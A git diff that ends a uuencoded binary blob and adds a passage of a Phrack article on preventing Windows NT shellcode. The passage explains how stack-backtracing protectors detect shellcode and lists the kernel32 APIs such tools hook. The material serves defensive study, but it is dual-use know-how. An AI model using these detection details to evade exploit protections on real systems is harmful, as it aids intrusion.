+M=#Z.$&IJ)BJC4O+DXW;H06-'6M&!]JN:(<=-+5J#1E+1ZN1H@L*^3#?,>+S6
+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
+C2I0H4:)$B1(E2I0H4:)$B1(E2I0H4:*T".F_J8K7K0#P````
+`
+end
diff --git a/phrack63/15.txt b/phrack63/15.txt
new file mode 100644
index 0000000..2b1655c
--- /dev/null
+++ b/phrack63/15.txt
@@ -0,0 +1,4344 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x0f of 0x14
+
+|=---------------------------------------------------------------------=|
+|=---------------=[ NT shellcodes prevention demystified ]=------------=|
+|=---------------------------------------------------------------------=|
+|=---------------=[by Piotr Bania <bania.piotr@gmail.com>]=------------=|
+
+
+                                              What was alive is now dead; 
+                                                   all that was beautiful
+                                       is now the ugliness of devastation
+                                          And yet I do not altogether die 
+                                             what is indestructible in me 
+                                                                 remains! 
+
+                                                   - Karol Wojtya,
+                                                     Sophie Arie in Rome
+
+                         ...this short thing is dedicated to You - R.I.P
+		                    ...a glorious era has already ended.
+
+
+
+
+--[ Contents
+
+
+   I.    Introduction
+
+   II.   Known protections
+
+    II.A  - Hooking API functions and stack backtracing.
+
+    II.B  - Security cookie authentication (stack protection)
+ 
+    II.C  - Additional mechanisms - module rebasing
+
+   III.  What is shellcode and what it "must do"
+
+   IV.   Getting addresses of kernel/needed functions - enemy study
+	
+    IV.A   - getting kernel address (known mechanisms)
+    
+     IV.A.A  -  PEB (Process Environment Block) parsing
+    
+     IV.A.B  -  searching for kernel in memory   
+
+    IV.B   - getting API addresses (known methods)
+
+     IV.B.A  -  export section parsing 
+
+     IV.B.B  -  import section parsing 
+
+   V.	New prevention techniques
+   
+   VI.	Action - few samples of catched shellcodes
+
+   VII.  Bad points (what you should know) - TODO
+
+   VIII. Last words
+
+   IX.   Code
+
+   X.    References
+
+
+
+
+--[ I.    Introduction
+
+
+Nowadays there are many exploit prevention mechanisms for windows but each 
+of them can by bypassed (according to my information). Reading this 
+article keep in mind that codes and information provided here will 
+increase security of your system but it doesn't mean you will be 
+completely safe (cut&paste from condom box user manual).
+
+
+--[ II.   Known protections
+
+
+Like I said before, today there exist many commercial prevention 
+mechanisms. Here we will get a little bit deeper inside of most common 
+ring3 mechanisms. 
+
+
+II.A   Hooking API functions and stack backtracing
+--------------------------------------------------
+
+Many nowadays buffer overflows protectors are not preventing the buffer 
+overflow attack itself, but are only trying to detect running shellcode. 
+Such BO protectors usually hook API functions that usually are used by 
+shellcode. Hooking can be done in ring3 (userland) or kernel level (ring0, 
+mainly syscalls and native api hooking). Lets take a look at example of 
+such actions:
+
+
+stack backtracing
+-----------------
+
+Lets check the NGSEC stack backtracing mechanism, now imagine a call was 
+made to the API function hooked by NGSEC Stack Defender.
+
+So when a call to any of hooked APIs is done, the main Stack Defender 
+mechanism stored in proxydll.dll will be loaded by the hooked function 
+stored in .reloc section. Then following tests will be done:
+
+
+Generally this comes up as params for the proxydll function (all of the 
+arguments are integers):
+assume:	 argument 1 = [esp+0ch] - its "first" passed argument to the 
+		      function this is always equal to the stack address 
+                      0xC bytes from the ESP.
+         argument 2 = address from where hooked api was called 
+         argument 3 = some single integer (no special care for this one)
+	 argument 4 = stack address of given param thru hooked API call
+         
+
+MAIN STEPS:
+- I. 	- execute VirtualQuery [1] on [esp+0Ch] (stack address)-LOCATION1
+- II. 	- execute VirtualQuery [1] on call_ret address - LOCATION2
+- III.	- if LOCATION1 allocation base returned in one of the members of
+	  MEMORY_BASIC_INFORMATION [2] is equal to the LOCATION2 
+          allocation base then the call is comming for the stack space. 
+          Stack Defender kills the application and reports attack probe to 
+          the user. If not next step is executed.
+- IV. 	- call IsBadWritePtr [3] on location marked as LOCATION2 (addres 
+          of caller). If the API returns that location is writeable Stack 
+          Defender finds it as a shellcode and kills the application. If 
+          location is not writeable StackDefender executes the original 
+          API.
+
+
+
+
+
+hooking exported API functions 
+------------------------------
+
+When module exports some function it means that it's making this fuction 
+usable for other modules. When such function is exported, PE file includes
+an information about exported function in so called export section. 
+Hooking exported function is based on changing the exported function 
+address in AddressOfFunctions entry in the export section. The great and 
+one of the first examples of such action was very infamous i-worm.Happy 
+coded by french virus writter named as Spanska. This one hooks send and 
+connects APIs exported from WSOCK32.DLL in order to monitor all outgoing 
+messages from the infected machine. This technique was also used by one of 
+the first win32 BO protectors - the NGSEC's Stack Defender 1.10. The NGSEC 
+mechanism modifies the original windows kernel (kernel32.dll) and hooks 
+the following functions:
+
+(the entries for each of the exported functions in EAT (Export Address 
+Table) were changed, each function was hooked and its address was 
+"repointed" to the .reloc section where the filtering procedure will 
+be executed)
+
+- WinExec
+- CreateProcessW
+- CreateProcessA
+- LoadLibraryExA
+- LoadLibraryExW
+- OpenFile 
+- CreateThread
+- CreateRemoteThread
+- GetProcAddress
+- LoadModule
+- CreateFileA
+- CreateFileW 
+- _lopen
+- _lcreat
+- CopyFileA
+- CopyFileW
+- CopyFileExA 
+- CopyFileExW 
+- MoveFileA 
+- MoveFileExW
+- LockFile
+- GetModuleHandleA
+- VirtualProtect
+- OpenProcess
+- GetModuleHandleW
+- MoveFileWithProgressA
+- MoveFileWithProgressW 
+- DeleteFileA 
+
+
+
+
+inline API hooking
